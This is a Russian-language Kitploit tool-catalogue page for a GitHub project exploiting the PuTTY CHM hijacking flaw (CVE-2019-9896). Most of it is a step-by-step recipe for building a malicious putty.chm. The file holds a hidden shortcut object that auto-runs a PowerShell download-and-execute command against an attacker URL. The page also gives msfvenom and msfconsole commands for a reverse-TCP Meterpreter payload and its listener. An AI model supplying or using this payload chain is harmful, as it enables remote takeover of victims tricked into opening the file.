Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vuln-chm-hijack — Потенциальное выполнение вредоносного кода через CHM hijacking (CVE-2019-9896) | Kitploit
Инструменты/GitHubGitHub/yasinyilmaz/vuln-chm-hijack
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubyasinyilmaz/vuln-chm-hijack

vuln-chm-hijack

Потенциальное выполнение вредоносного кода через CHM hijacking (CVE-2019-9896)

Репозиторий
79167 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость PuTTY vuln-chm-hijack

Возможное выполнение вредоносного кода через перехват CHM

Описание

Начиная с версии 0.70 и ранее, при запуске онлайн-справки в любом из графических инструментов PuTTY для Windows, инструмент искал свой файл справки рядом со своим собственным исполняемым файлом.

Если вы запускали PuTTY из каталога, в который посторонний код мог поместить файлы (например, запуская его прямо из каталога загрузок браузера по умолчанию), это означает, что если кто-то умудрился поместить файл с именем putty.chm в этот каталог (например, заманив вас нажать на ссылку загрузки с таким именем), то PuTTY посчитал бы его настоящим файлом справки и передал бы его htmlhelp.exe.

Это уязвимость, так как файлы HTML-справки (.chm) могут, в свою очередь, запускать код по своему выбору, например, встраивая HTML-элемент , который является ярлыком Windows, вместе с JavaScript для его активации.

Подробнее: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html

Что такое CHM файл?

CHM — это расширение для формата скомпилированных HTML-файлов, чаще всего используемое программой справки Microsoft на основе HTML. Он может содержать множество сжатых HTML-документов, а также изображения и JavaScript, на которые они ссылаются. Возможности CHM включают оглавление, индекс и полнотекстовый поиск.

Использовалось ли это ранее?

В прошлом злоумышленники использовали CHM-файлы для загрузки файлов бэкдора, что часто применяется в целевых атаках.

Некоторые примеры:

https://www.bleepingcomputer.com/news/security/malicious-chm-files-being-used-to-install-brazilian-banking-trojans/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

Процедура создания вредоносного CHM файла

Нам понадобится набор инструментов HTML Help Workshop для создания CHM-файла. После установки запустите HTML Help Workshop.

Шаги

Нажмите File > New > Project и следуйте шагам ниже:

Создание проекта HTML Help

  1. Экран нового проекта > Next > Browse

  2. Укажите имя вашего файла проекта и место, где вы хотите его создать.

Заполните имя файла: putty и нажмите "Open"

Укажите ваш проект HTML Help

  1. Если у вас уже есть созданный HTML-файл, который вы хотите включить в проект, выберите его.

Выберите HTML-файлы (.htm)

Укажите, где находятся ваши .htm файлы.

Кнопка Add.. и выберите уже созданную директорию для эксплойта, чтобы разместить ваш вредоносный файл, например, putty.htm

Выбор HTM файла

  1. Мастер создаст новый проект HTML Help. Нам нужно внести изменения.

  2. В инструменте дважды щелкните по созданному htm, чтобы отредактировать его, затем вставьте приведенный ниже код для создания базового файла справки:

root@kitploit:~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>
  1. Теперь мы создаем объект-кнопку, который запускает вредоносный exe-файл при нажатии. Кроме того, добавляем скриптовую часть, которая автоматически нажимает кнопку при открытии документа:
root@kitploit:~
<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{URL ВАШЕГО ВРЕДОНОСНОГО ФАЙЛА}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Добро пожаловать! </h3></p>
</body>
</html>

Создание вредоносного файла

  1. Команда PowerShell подключится к указанному удаленному URL и выполнит meterpreter, который будет отправлен сайтом. Этот удаленный скрипт может быть другим PowerShell-скриптом (.ps) или полезной нагрузкой Meterpreter для Windows.

Как создать простую полезную нагрузку TCP Meterpreter для Windows?

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST={ВАШ IP} LPORT={ПОРТ} -f exe > malware.exe

Когда вы дважды щелкаете по кнопке «Help», putty.exe запускается как дочерний процесс malware.exe, который является интерпретатором CHM-файла. (Ваш вредоносный putty.chm и putty.exe должны находиться в одной директории)

Запуск вредоносного ПО

Как получить оболочку meterpreter?

root@kitploit:~
msfconsole 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost {ВАШ IP}
lhost => {ВАШ IP}
msf exploit(multi/handler) > set lport {ПОРТ}
lport => {ПОРТ}
msf exploit(multi/handler) > run

Ресурсы:

  1. https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html
  2. https://safe-cyberdefense.com/hide-malware-microsoft-html-interpretors/

Скачать инструмент